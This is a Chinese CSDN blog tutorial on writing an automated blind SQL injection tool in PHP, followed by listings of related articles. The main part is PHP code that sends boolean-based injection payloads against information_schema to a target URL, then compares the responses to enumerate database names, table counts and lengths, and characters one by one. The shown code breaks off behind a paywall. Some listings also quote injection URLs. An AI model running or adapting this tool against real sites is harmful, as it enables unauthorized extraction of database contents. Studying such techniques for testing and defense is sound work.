让你轻松学会PHP版自动化SQL盲注工具-全库-全表-全字段-全字段值查询

最新推荐文章于 2024-07-24 18:00:00 发布
最新推荐文章于 2024-07-24 18:00:00 发布
阅读量429 收藏
点赞数
分类专栏: 安全 网络 文章标签: 网络安全 信息安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HBohan/article/details/119181133
版权
本文介绍了如何使用PHP编写一个自动化SQL盲注工具,包括利用information_schema库获取数据库信息,通过位运算优化查询效率,以及工具的使用注意事项。详细讲解了MySQL位运算盲注的原理和代码实现。
摘要由CSDN通过智能技术生成

在这里插入图片描述

前言

由于一些个人原因,很久没有研究WEB安全方面的一些问题了(废话四个月前月还发了帖),正好炎炎夏日暑假的生活到来,这个时候我需要的是恶补,恶补,恶补。兜兜转转到了SQL盲注部分,然后在SQL盲注上面下了不少功夫,因为最初没有怎么去理解它,都是拿着sqlmap一顿梭。原谅我非要把我的学习过程写下来,取工具翻到最下最下最下就OK了。hhh。

information_schema图

看什么看,这就是一张图片

在这里插入图片描述

因为SQL盲注时注入数据会常用到information_schema库,所以自己总结成一张图片大家也抽空记忆一下

SQL盲注简单又”复杂”的方法

针对于SQL盲注我们不会像联合注入一样非常轻松,有时需要burpsuite进行爆破,有时我们需要安装sqlmap(没有sqlmap我玩个寂寞啊),而有时结构复杂我们又非得自己写工具,所以我们先看看关于SQL盲注的一些方法吧。
对于Mysql的内置函数,如database()等函数还是比较容易的。
在页面返回true或false的情况下我们可以通过逻辑与运算,来进行判断database()函数的长度,例如and length((select database()))=1、and length((select database()))=2、and length((select database()))=3…直到页面返回true。随后可以借助mid/substr字符串截取函数来进行一个一个字符的猜解。例如:and substr(database(),1,1)=’r’。那么当我们要进行获取数据库内的信息时,我们需要借助information_schema库。但针对于SQL盲注来讲,information_schema库我们如果手工的话,可能这个夏天要过去了吧。
首先这里先了解一下盲注information_schema库是怎么个玩法,再来编写脚本。
我们要知道information_schema.schemata的schema_name有几条(总共有几个数据库?),还要通过schema_name的条数来通过limit来对每一条的长度进行计算(我要得到的信息有几位字母/数?),然后我们通过字符的长度来通过substr截取出来然后判断每一个字符是什么(我要得到的信息是什么?)。好了,你成功的得到了一条数据。
我们的算法就是非常简单,就是一个一个试,试一年,拿一个字符是一个字符,拿一条数据库信息就是赚到,安全就是这么勤奋且有趣

针对于SQL盲注简单又”复杂”的方法的PHP脚本编写

<!DOCTYPE html>
<html>
<head>
        <title>SQL盲注工具-.-By:T00ls</title>
        <meta charset="utf-8">
</head>
<body>
<?php
ini_set('max_execution_time',0);
$dbname = isset($_GET['dbname']) ? $_GET['dbname'] : '';
$tablename = isset($_GET['tablename']) ? $_GET['tablename'] : '';
$columnname = isset($_GET['columnname']) ? $_GET['columnname'] : '';

$_az = range('a','z');
$_AZ = range('A','Z');
$_19 = range('1','9');
$_other = array('@','_','.','%','/');
$_sum = array_merge($_az,$_AZ,$_19,$_other);


$sqlUrl = 'http://www.phptest.com/6.php?id=1';
$okContent = file_get_contents($sqlUrl);

if(!$dbname){
   
        $DBCount = 1;
        while(true){
   //获取count
                $InjectionStatement = '+and+(select+count(schema_name)+from+information_schema.schemata)='.$DBCount.'+--+';
                $DBTesting = file_get_contents($sqlUrl.$InjectionStatement);
                if($DBTesting == $okContent){
   
                        break;
                }else{
   
                        $DBCount ++;
                }
        }
        $DBLengthArr = array();
        for($i = 0; $i < $DBCount; $i++){
   
                $TempNum = 1;
                while(true){
   
                        $InjectionStatement = '+and+length((select+schema_name+from+information_schema.schemata+limit+'.$i.',1))='.$TempNum.'+--+';
                        $DBTesting = file_get_contents($sqlUrl.$InjectionStatement);
                        if($DBTesting == $okContent){
   
                                $DBLengthArr[$i] = $TempNum;
                                break;
                        }else{
   
                                $TempNum ++;
                        }
                }
        }
        $DBNameArr = array();
        foreach ($DBLengthArr as $Llimit => $dblength) {
   
                for ($i=1; $i <= $dblength; $i++) {
    
                        foreach ($_sum as $key => $value) {
   
                                $InjectionStatement = '+and+mid((select+schema_name+from+information_schema.schemata+limit+'.$Llimit.',1),'.$i.',1)="'.$value.'"'.'+--+';
                                $DBTesting = file_get_contents($sqlUrl.$InjectionStatement);
                                if($DBTesting == $okContent){
   
                                        $DBNameArr[$Llimit] .= $value;
                                        break;
                                }
                        }
                }
                
        }
        $DBName = implode('<br>',$DBNameArr);
        die('盲注完成,当前数据库名称有:<br>'.$DBName);
}else{
   
        $InjectionStatement = '+and+find_in_set("'.$dbname.'",(SELECT+group_concat(schema_name,",")+FROM+information_schema.schemata+where+schema_name="'.$dbname.'"))'.'+--+';
        $DBTesting = file_get_contents($sqlUrl.$InjectionStatement);
        if($DBTesting <> $okContent){
   
                die($dbname.'数据库不存在,请重新复制粘贴,谢谢');
        }
}

if(!$tablename){
   
        $TBcountFlag = false;
        $TBlength = 1;

        while(true){
   
                $InjectionStatement = '+and+(SELECT+count(*)+FROM+information_schema.tables+WHERE+table_schema="'.$dbname.'")='.$TBlength.'+--+';
                if(file_get_contents($sqlUrl.$InjectionStatement) == $okContent){
   
                        break;
                }else{
   
                        $TBlength ++;
                }
        }
        $TBNameArr = array();
        $TBSubArr = array();

        for($i = 1; $i <= $TBlength; $i++){
   
                $TBFlag = 1;
                while(true){
   
                        $InjectionStatement = '+and+(SELECT+length(table_name)+FROM+information_schema.tables+WHERE+table_schema="'.$dbname.'"+limit+'.($i-1).',1)='.$TBFlag.'+--+';
                        $DBTesting = file_get_contents($sqlUrl.$InjectionStatement);
                        if($DBTesting == $okContent){
   
                                $TBSubArr[$i-1] .= $TBFlag;
                                break;
                        }else{
   
                                $TBFlag ++;
                        }
                }        
        }

        foreach ($TBSubArr as $k => $v) {
   
                for($j = 1; $j <= $v; $j++
最低0.47元/天 解锁文章
IT老涵
关注
专栏目录
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
1. sqlmap是一款强大的自动化SQL注入工具,它可以自动识别SQL注入漏洞并利用它们。在本实验中,我们将用sqlmap对DVWA(Damn Vulnerable Web Application)靶场进行测试。 2. 首先,我们需要获取靶机上的数据库信息...
SQL盲注利用工具
11-15
使用Ruby语言编写的一款SQL盲注利用工具,它使用盲注方法从SQL数据库中检索数据
工具SQL盲注
07-01 1448
工具-SQL盲注
Hakuin:一款自动化SQL盲注(BSQLI)安检测工具
最新发布
FreeBuf_的博客
07-24 2214
Hakuin是一款功能强大的SQL盲注漏洞安检测工具,该工具专门针对BSQLi设计,可以帮助广大研究人员优化BSQLi测试用例,并以自动化的形式完成针对目标Web应用程序的漏洞扫描与检测任务。该工具允许用户以轻松高效的形式对目标Web应用程序执行BSQLi安检测,并采用了多种优化方法,包括预训练和自适应语言模型、机会性猜测和并行性机制等。由于该工具基于Python 3开发,因此我们首先需要在本地设备上安装并配置好最新本的Python 3环境。本项目的开发与发布遵循。
sql注入半自动化扫描工具——盲注(分析后续补上)
18年3月萌新白帽子
06-11 789
代码展示墙: 先将代码保存在这里,解析以后会补上# -*- coding: utf-8 -*-import requestsimport sysimport hashlibfrom optparse import OptionParserparser=OptionParser()parser.add_option("-D", "--Database", action="store",type="s...
SQL盲注的框架——BBQSQL
nani1114的博客
09-19 2715
BBQSQL是一种用Pyhthon写的SQL盲注框架。当发动狡猾的SQL注入漏洞攻击时,它将非常有用。BBQSQL也是半自动工具,允许许多难以触发的SQL注入变得用户化。该工具是与数据库无关的,其用法非常灵活。它也自带一个直观的UI用户界面,使设置攻击更容易。Python Gevent也很给力,使BBQSQL非常快速。   SQL盲注可能很难被利用。作为可用工具它们很高效,但当
Sql注入工具php,phpcms框架SQL注入--基于Havij工具
weixin_39754267的博客
03-17 360
sql注入的步骤:1.首先观察网站是通过GET还是POST方式传输数据的:a.如果是GET传输,则在url中输入?id=1' 或者 " 或者 ') 来测试是否存在sql注入。b.如果是POST传输,则在输入框中输入?id=1' 或者 " 或者 ') 来测试是否存在sql注入。2.测试完成发现存在注入,进行注入,先测试有多少表单:a.?id=1 order by *(*数字为数字)进行测试,3.测试...
mysql 猜解字段,DVWA等级SQL Injection(Blind)盲注--手工测试过程解析
weixin_42610671的博客
03-17 699
一、DVWA-SQL Injection(Blind)测试分析SQL盲注 VS 普通SQL注入:普通SQL注入SQL盲注1.执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等2.一般在页面上直接就会显示执行sql语句的结果1.一般情况,执行SQL盲注,服务器不会直接返回具体的数据库错误or语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的盲注...
SQL注入攻击-高级方法,手动注入 自动化注入
11-17
2. **最小化SQL权限**:数据库用户只应具有执行其功能所需的基本权限,减少攻击者潜在的影响范围。 3. **过滤措施**:对用户输入进行严格的验证和清理,避免非法字符和SQL指令的出现。 4. **安配置**:不显示详细...
穿山甲自动SQL注入工具Pangolin
11-24
【穿山甲自动SQL注入工具Pangolin】是一款强大的自动化SQL注入渗透测试工具,它专为安研究人员和网络防御者设计,用于检测和评估Web应用程序的SQL注入漏洞。这款工具的目的是帮助用户发现并修复潜在的安风险,...
PHP+MySql注入工具
02-01
计算机学习PHP+MySql注入工具,放心用吧'_'
注入工具盲注猜解工具
02-24
注入工具盲注猜解工具 ===配置文件Inject.ini=== 先贴出代码再说明: ------------------------------------- [url]手工猜字符语句完整URL 没有特殊字符过滤的语句: http://www.xxx.net/list.asp?id=286 and 0<>(select count(*) from Admin where asc(mid(username,1,1))>88) and 1=1 有特殊字符过滤的语句: http://127.0.0.1/phpcms2008_gbk/phpcms/yp/job.php?action=applylist&genre=%B2%A9%CA%BF%27 and 0%3c%3e%28select count%28*%29 from phpcms_member where ascii%28mid%28username,1,1%29%29%3e88 and userid=1%29# 参数设置运行后输出情况: Read Config & URL Match OK! url_main is http://127.0.0.1/phpcms2008_gbk/phpcms/yp/job.php?action=applylist&g enre=%B2%A9%CA%BF%27 and 0%3c%3e%28select count%28*%29 from phpcms_member where ascii%28mid%28username, url_midcount is 1 url_a is ,1%29%29 url_ascii is %3e88 url_end is and userid=1%29# [url_strlen]字符串长度,要自己事先猜出来再写进来,很简单 10 [KeyString]关键词,自己取,最好是英文或汉字,繁体字有时候会报错 返回正常页面的时候我才会出现 [url_midcount]从字符串的第几个字符开始猜,可以不用管,默认从第一个开始 1
PHP SQL注入扫描器
10-28
又是一个傻瓜作品,而且没完成,主要是有些函数测了半天,还是无法完成相应的功能
超级SQL注入工具【SSQLInjection】V1.0 正式 20200209.zip
05-26
一款基于HTTP协议自组包的SQL注入工具工具采用C#开发,直接操作TCP会话来进行HTTP交互,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入;支持以盲注、错误显示、Union注入等方式来获取数据;里含教程地址
SQL注入漏洞扫描工具Hexjector 1.0.7.4
05-01
Hexjector是一个开放源代码、跨平台、自动化SQL注入漏洞渗透测试工具,该工具PHP脚本语言开发,非常容易安装和使用。 产品特点: 检测SQL注入漏洞。 Pentest SQL注入漏洞。 检测站点上的应用网关(WAF) 扫描后台管理页面 手动注入 浏览器 SQL注入类型检测
sql盲注
weixin_50205723的博客
09-23 342
盲注 首先判断注入类型 可以发现我们对url进行注入页面没有给我们什么有用的提示,那么我们可以判断这应该需要盲注 一、布尔类型 1、判断数据库长度 id' or length(database())>7 --+ id' or length(database())>8 --+ 可以发现数据库名大于7正确但是大于8错误那么应该是8 2、测试数据库名具体字符 使用substr函数对数据库名进行获取(substr函数只能一个一个字符获取)并且使用ascii函数将获得的转换为数字进行比较 id=0
php做一个sql注入漏洞分析工具
weixin_42584507的博客
12-27 198
可以使用 PHP 来创建一个 SQL 注入漏洞分析工具。具体来说,你可以使用 PHP 的 PDO (PHP Data Objects) 扩展来创建一个工具,用于检测网站是否存在 SQL 注入漏洞。 下面是一个简单的示例代码,可以帮助你开始创建这样的工具: <?php // 连接到数据库 $db = new PDO('mysql:host=localhost;dbname=testdb', '...
SQLMap攻略:自动化SQL注入工具详解
SQLMap是一款强大的自动SQL注入工具,其目的是帮助安测试人员快速、有效地检测和利用SQL注入漏洞。该工具的设计初衷是简化渗透测试过程,并提供了一种面的方法来探测和利用各种类型的SQL注入攻击。 SQLMap的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值